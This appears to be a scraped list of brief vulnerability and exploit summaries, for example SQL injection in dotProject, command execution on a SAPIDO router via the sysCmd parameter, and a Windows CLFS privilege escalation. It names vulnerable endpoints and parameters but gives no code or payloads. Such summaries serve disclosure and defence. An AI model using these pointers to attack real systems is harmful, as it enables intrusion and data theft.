BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory.
A SQL injection vulnerability exists in AZADMIN CMS of HIDEA v1.0. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the backend database. This can be exploited to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'cod' parameter of the 'news_det.php' script. An attacker can send a specially crafted HTTP request containing malicious SQL commands to the vulnerable script and execute arbitrary SQL commands in the backend database.
This exploit allows an attacker to execute arbitrary commands as root on a Fortinet FortiCam MB40 device. The exploit works by using a crafted HTML document that contains a malicious JavaScript code. The code creates an image element with a URL that contains a command injection payload. This payload is then executed when the URL is requested. The command injection payload is used to create a reverse shell from the device to the attacker's host, allowing the attacker to execute arbitrary commands as root.
This exploit allows an attacker to execute arbitrary commands on the vulnerable SAPIDO RB-1732 router. The exploit sends a POST request to the router's /goform/formSysCmd page with the command to be executed in the sysCmd parameter. The response contains the output of the command in a textarea element.
SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. This is an intended feature but leaves the system open (by default) to unauthenticated remote command execution by abusing the 'executable' plugin with an NRPE client.
The kernel’s CmpAddRemoveContainerToCLFSLog function doesn’t safely create new transaction log containers leading to arbitrary file creation and EoP. The configuration manager in the kernel supports creating registry keys within a transaction. To store the transaction log data a CLFS log file is used which is split into multiple containers. These transaction log files are stored within the same directory as the hive files with the names ending BLF. Container files, with the suffix TxR.X.regtrans-ms are created on demand if the amount of transaction data being stored is larger than available log space. As these container files are created within the security context of the process creating the transaction this creates a problem as the CLFS driver always creates file with the previous mode set to UserMode. This would mean a non-administrator couldn’t create transactions in any hive which is stored in a location they can’t write to, which includes any HKLM hive which wouldn’t be very useful. To solve this problem before calling ClfsAddLogContainer the kernel code attaches the calling thread to the System process and disables any impersonation token which ensures the call to CLFS will come from the SYSTEM user. This becomes an issue for the user’s registry hives as those hive files are located in user writable locations. Therefore as the names of the containers are predictable (just using an incrementing counter) it’s possible to redirect the container file creation through abusing symbolic links.
A path traversal vulnerability in the LetsEncryptController allows remote unauthenticated users to view any files that the application has read/view permissions to. This vulnerability affects Windows and Unix operating systems.
A persistent cross-site scripting (XSS) vulnerability exists in out/out.GroupMgr.php in SeedDMS before 5.1.11. An authenticated user with admin privileges can inject arbitrary JavaScript code into the application. This code will be executed in the browser of any user who visits the application. To exploit this vulnerability, an attacker must be authenticated as an admin user and create a new group with a malicious JavaScript payload. When the group is chosen, the malicious code will be executed in the browser of any user who visits the application.
dotProject 2.1.9 is vulnerable to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities by sending malicious payloads to the vulnerable parameter 'event_id' in the POST request. This can allow the attacker to execute arbitrary SQL commands on the underlying database.
Electronic Arts' Origin Client on Windows in versions 10.5.38 and below is vulnerable to an argument injection vulnerability, that if leveraged properly, can ultimately yield remote code execution. The vulnerability lies in the fact that Origin does not properly sanitize user input when launching a game, allowing for arbitrary command line arguments to be injected into the Origin process.
Services By CQR